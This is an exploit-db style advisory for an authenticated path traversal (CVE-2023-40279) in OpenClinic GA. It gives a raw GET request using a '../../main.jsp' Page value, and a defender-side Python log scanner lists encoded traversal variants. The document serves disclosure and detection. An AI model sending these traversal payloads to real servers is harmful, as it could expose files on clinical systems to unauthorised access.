OpenClinic GA 5.247.01 – Path Traversal (Authenticated)

  • Author: VB
    Date: 2024-04-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51995/
  • # Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)
    # Date: 2023-08-14
    # Exploit Author: V. B.
    # Vendor Homepage: https://sourceforge.net/projects/open-clinic/
    # Software Link: https://sourceforge.net/projects/open-clinic/
    # Version: OpenClinic GA 5.247.01
    # Tested on: Windows 10, Windows 11
    # CVE: CVE-2023-40279
    
    # Details
    An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories.
    
    # Proof of Concept (POC)
    Steps to Reproduce:
    
    1. Crafting the Malicious GET Request:
    
    - Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.
    - Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):
    
    GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1
    Host: 192.168.100.5:10088
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Connection: close
    Cookie: JSESSIONID=[SESSION ID]
    Cache-Control: max-age=0
    
    2. Confirming the Vulnerability:
    - Send the crafted GET request to the target server.
    - If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.
    - This vulnerability can lead to sensitive information disclosure or more severe attacks.
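
    As an added defender-side example (not part of the advisory or of OpenClinic GA itself), the code below scans constructed Tomcat-style access log lines for main.do requests whose Page parameter, after repeated percent-decoding, resolves outside an assumed page root; the same escapes_root() test is the server-side validation a fix would apply before dispatching. PAGE_ROOT, the client addresses and the log lines are assumptions constructed for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Tomcat-style access log lines (hypothetical clients/timestamps); the Page
# values mirror the advisory's ../../main.jsp plus single- and double-encoded forms.
SAMPLE_LOG = """\
10.0.0.7 - - [14/Aug/2023:10:02:11 +0000] "GET /openclinic/main.do?Page=curative/index.jsp HTTP/1.1" 200 5123
10.0.0.9 - - [14/Aug/2023:10:02:19 +0000] "GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1" 200 2210
10.0.0.9 - - [14/Aug/2023:10:02:25 +0000] "GET /openclinic/main.do?Page=..%2F..%2Fmain.jsp HTTP/1.1" 200 2210
10.0.0.9 - - [14/Aug/2023:10:02:31 +0000] "GET /openclinic/main.do?Page=%252e%252e%2Fmain.jsp HTTP/1.1" 200 2210
10.0.0.4 - - [14/Aug/2023:10:03:02 +0000] "GET /openclinic/login.do HTTP/1.1" 200 1800
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})',
    re.MULTILINE,
)

# Assumed directory the dispatcher should serve pages from (not taken from the product).
PAGE_ROOT = "/opt/openclinic/pages"


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %252e%252e/ is seen as ../ (double-encoding bypass)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_root(page_value: str, root: str = PAGE_ROOT) -> bool:
    """True if the decoded, normalised Page value resolves outside root (the fix-side check)."""
    decoded = decode_fully(page_value).replace("\\", "/")  # the target runs on Windows too
    resolved = posixpath.normpath(posixpath.join(root, decoded))
    return resolved != root and not resolved.startswith(root + "/")


def scan_log(text: str) -> list:
    """Return (client, decoded Page, status) for main.do requests whose Page escapes root."""
    findings = []
    for m in LOG_RE.finditer(text):
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/main.do"):
            continue
        for page in parse_qs(parts.query, keep_blank_values=True).get("Page", []):
            if escapes_root(page):
                findings.append((m["client"], decode_fully(page), int(m["status"])))
    return findings
```

A 200 status on a flagged line is the signal to triage: it means the traversal was served rather than rejected.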